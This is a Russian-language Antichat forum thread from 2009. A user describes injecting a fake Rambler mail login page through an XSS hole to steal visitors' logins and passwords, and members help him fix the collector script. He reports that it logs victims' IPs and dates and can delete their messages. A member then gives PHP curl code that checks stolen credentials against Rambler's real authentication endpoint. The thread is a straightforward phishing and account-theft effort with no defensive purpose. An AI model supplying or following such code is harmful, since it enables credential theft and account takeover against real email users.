Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Вопрос по поводу xss + фейк. |
16.03.2009, 22:16
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Вопрос по поводу xss + фейк.
Подскажите пожалуйста. Замучался искать примеры - пару часов ищу по всему яндексу.
Раньше я использовал команду POST при передачи и записи файлов из обычного фейка в файл.
Сейчас я нашёл xss на рамблере - сделал всё правильно, т.е. вставил в эту xss фейк рамблера. И тут встретилась команда GET. Вопрос такой: какой код команды GET в принимающем файле от xss с js-ява скриптом надо прописать в принимающем файле для приёма логина и пароля. Хоть приблизительно накиньте - а там я доделаю. Замучался искать просто.
|
|
|
16.03.2009, 22:21
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
исправь у себя $_POST на $_GET =)
|
|
|
|
16.03.2009, 22:22
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Исправил - не помогает. Уже всё перепробовал.
Сам скрипт ява имеет такой вид:
PHP код:
<form method="get" action="'+getaction+'" name="auth_form"><input type="hidden" name="from" value=""><input type="hidden" name="back" value="http://mail.rambler.ru/mail/startpage"><input type="hidden" name="url" value=""><table cellpadding="5" cellspacing="0" border="0" width="100%"><tr valign="top"><td class="txt" align="left" width="22%"><label for="login">Ваше имя на Рамблере (логин):</label></td><td width="230"><table cellpadding="0" cellspacing="0" border="0" width="230" <tr><td width="100%"><input type="text" name="Login" id="login" value="" size="10" maxlength="129" tabindex="1" style="width: 100%;"></td><td valign="top"> <span class="txt">@rambler.ru</span></td></tr></table></td><td rowspan="3" width="5%"></td><td rowspan="2" align="left"><div class="ttl_small">Нет имени?</div><div class="txt"><a ref="http://id.rambler.ru/script/newuser.cgi?back=http%3A%2F%2Fmail.rambler.ru%2Fmail%2Fstartpage">Выберите имя
Последний раз редактировалось anton15; 16.03.2009 в 22:30..
|
|
|
|
16.03.2009, 22:55
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Должен работать, если все правильно изменил.
|
|
|
|
16.03.2009, 22:59
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Записываются, но только две точки... логина и пароля нет. Переменные вроде бы правильные: Login и passw - в скрипте такие же... Когда то было такое, причиной были переменные и их названия, но сейчас они правильные... тогда почему точки?
|
|
|
|
16.03.2009, 23:14
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Есть где-нибудь фейк такого же типа через xss на примере, хоть старый трёхлетней давности с закрытой xss на одном из емайл сервисов? если есть скиньте пожалуйста ссылочку. Я посмотрю и на примере сделаю.
|
|
|
|
17.03.2009, 01:14
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Тема закрыта. Спасибо Всем за внимание.  Сейчас сяду, часков пять голову поломаю и заработает, а куда она ещё денется |
|
|
|
21.03.2009, 00:20
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Сделал данную вещь, всё записывается, также прописал, чтобы записывался ip, дата, и удаление письма если надо.
У меня возник опять вопросик:
Нужно сделать так, чтобы фейк был и проверял данные по правильности и на валидность (с проверкой на валидность вводимых паролей) - т.е. человек заходит на форму фейка, далее вводит пароль - если он ввёл пароль не правильно, то его перебрасывает на страницу, которую я укажу с предупреждением: пароль введён не верно; а если он ввёл правильно, то перебрасывает на страницу, которую я укажу - с указанием, спасибо, всё введено правильно.
Может кто-нибудь дать пример? как это всё сделать - может есть у кого-нибудь пример данного скрипта? Мне бы примерчик, а там я додумаю.
|
|
|
|
21.03.2009, 01:39
|
|
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771
Репутация:
1916
|
|
Да принцип простой. Отправляешь полученные данные на рамблер и смотришь.
PHP код:
<?php
$login = 'qwerty';
$password = '12345';
$postdata = 'back=http%3A%2F%2Fmail.rambler.ru%2Fmail%2Fstartpage&login=' . $login . '&passw=' . $password;
$cl = curl_init('http://id.rambler.ru/script/auth.cgi');
curl_setopt($cl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cl, CURLOPT_POST, 1);
curl_setopt($cl, CURLOPT_POSTFIELDS, $postdata);
$result = curl_exec($cl);
curl_close($cl);
?>
Далее в ответе ищешь совпадение на фразу "Неправильный логин или пароль". Если присутствует, заставляй логиниться ещё раз. |
|
|
|
21.03.2009, 01:56
|
|
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607
Репутация:
5
|
|
Всё понял приблизительно - дальше додумаю...
когда пять часиков голову поломаю...
Всем большое спасибо за внимание к моей теме - всем очень благодарен. Всех благодарю.
Тема закрыта, модератор можешь тему удалять, а можешь оставить.
Всем Доброго времени суток. |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
